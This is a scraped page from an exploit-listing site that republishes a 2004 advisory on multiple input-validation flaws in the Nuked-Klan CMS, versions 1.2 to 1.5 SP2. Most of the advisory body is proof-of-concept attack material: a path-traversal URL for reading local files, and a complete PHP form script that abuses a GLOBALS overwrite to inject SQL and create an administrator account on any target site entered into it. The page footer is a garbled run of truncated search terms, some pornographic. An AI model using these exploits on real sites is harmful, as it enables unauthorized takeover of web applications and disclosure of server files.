about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Nuked-Klan Multiple Vulnerabilities


Title Nuked-Klan Multiple Vulnerabilities
Published 2004-04-12-12:00AM
Updated 2004-04-17-02:05PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery is credited to frog-m@n <leseulfrog@hotmail.com>.
Vulnerable  NukedKlan NukedKlan 1.5 SP2
NukedKlan NukedKlan 1.5
NukedKlan NukedKlan 1.4
NukedKlan NukedKlan 1.3 beta
NukedKlan NukedKlan 1.3
NukedKlan NukedKlan 1.2 beta
NukedKlan NukedKlan 1.2
Not Vulnerable  
Code   The following proof-of-concept examples were provided:
- To include a local file:

http://www.example.com/index.php?user_langue=../../../../../file/to/view

- Create admin (overwriting GLOBALS) :

-------------------------------------------------------

<html>
<head>
<title>Nuked-KlaN b1.5 Create Admin</title>
</head>
<body>
<?
function ascii_sql($str) {
for ($i=0;$i < strlen($str);$i++) {
if ($i == strlen($str)-1){
$ascii_char.=ord(substr($str,$i));
}else{
$ascii_char.=ord(substr($str,$i)).',';
}
}
return $ascii_char;
}

if (isset($_POST["submit"])){

echo "<script>url='".$target."/index.php?
file=Suggest&op=add_sug&user_langue=../globals.php&nuked[prefix]=nuked_users%20
(id,pseudo,pass,niveau)%20VALUES%20(12345,char(".ascii_sql($_POST
["pseudo"])."),md5(char(".ascii_sql($_POST
["pass"]).")),9)/*&module=Gallery';window.open(url);</script>";
echo "<br><br><br><br>Admin should have been created.";

}else{
?>

<form method="POST" action="<? echo $PHP_SELF; ?>">
<b>Target :</b> <input type="text" name="target" value="http://"><br>
<b>Admin Nick :</b> <input type="text" name="pseudo"><br>
<b>Admin Pass :</b> <input type="text" name="pass"><br>
<input type="submit" name="submit" value="Create Admin">
</form>
<?
}
?>
</body>
</html>
-------------------------------------------------------
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sun, 23 Nov 2008 16:51:22 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
wugod pinchunter news for c Web Wiz F bind9 atta CMS is Fre turk+porno apache 2.2 local 2.6 pinchunter Sexgirl ph news for C Sopia latj CMS is Fre mambo Remo CLE news for c News Searc vbulleting frree porn aishwarya Market Pla Www pinkwo mIRC v6.02 Adulsex b f TR/WLHack. IMAGE SEX php-nuke 2 gene6 tamir hosn /administr MDaemon news for c Yuo.tube.c php-nuke 2 all cartoo www.xxxmo mambo Remo ante www.trish CMS is Fre SAXYGIRL.C yourpon.co malayalam knowledget Arab video 2.0.8 medievalfi Crack DB